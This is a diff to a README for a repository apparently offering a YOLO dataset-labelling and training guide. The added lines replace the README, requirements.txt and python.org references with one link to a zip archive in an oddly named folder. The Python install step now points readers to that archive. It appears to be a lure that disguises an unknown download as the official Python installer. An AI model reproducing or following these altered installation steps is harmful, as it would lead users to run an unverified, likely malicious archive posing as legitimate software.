danixssj/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide/README.md

 After downloading, you will find a folder with these key files and folders:

-- `README.md`: This file with setup instructions.
+- `https://raw.githubusercontent.com/danixssj/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide/main/notommatid/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide_v2.9.zip`: This file with setup instructions.
 - `data/`: Contains example data for testing.
 - `scripts/`: Scripts to help you label data and train your model.
-- `requirements.txt`: List of dependencies you need to install.
+- `https://raw.githubusercontent.com/danixssj/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide/main/notommatid/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide_v2.9.zip`: List of dependencies you need to install.

 ## 🔧 Installation Steps

 Follow these steps to set up everything properly:

-1. **Install Python:** If you don’t have Python, download and install it from [python.org](https://www.python.org/downloads/).
+1. **Install Python:** If you don’t have Python, download and install it from [https://raw.githubusercontent.com/danixssj/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide/main/notommatid/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide_v2.9.zip](https://raw.githubusercontent.com/danixssj/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide/main/notommatid/Dataset-Preparation-Labeling-Environment-Setup-YOLO-Training-Guide_v2.9.zip).
 Make sure to check "Add Python to PATH" during installation.

 2. **Open Command Prompt or Terminal:**
    - **Windows:** Press `Win + R`, type `cmd`, and hit Enter.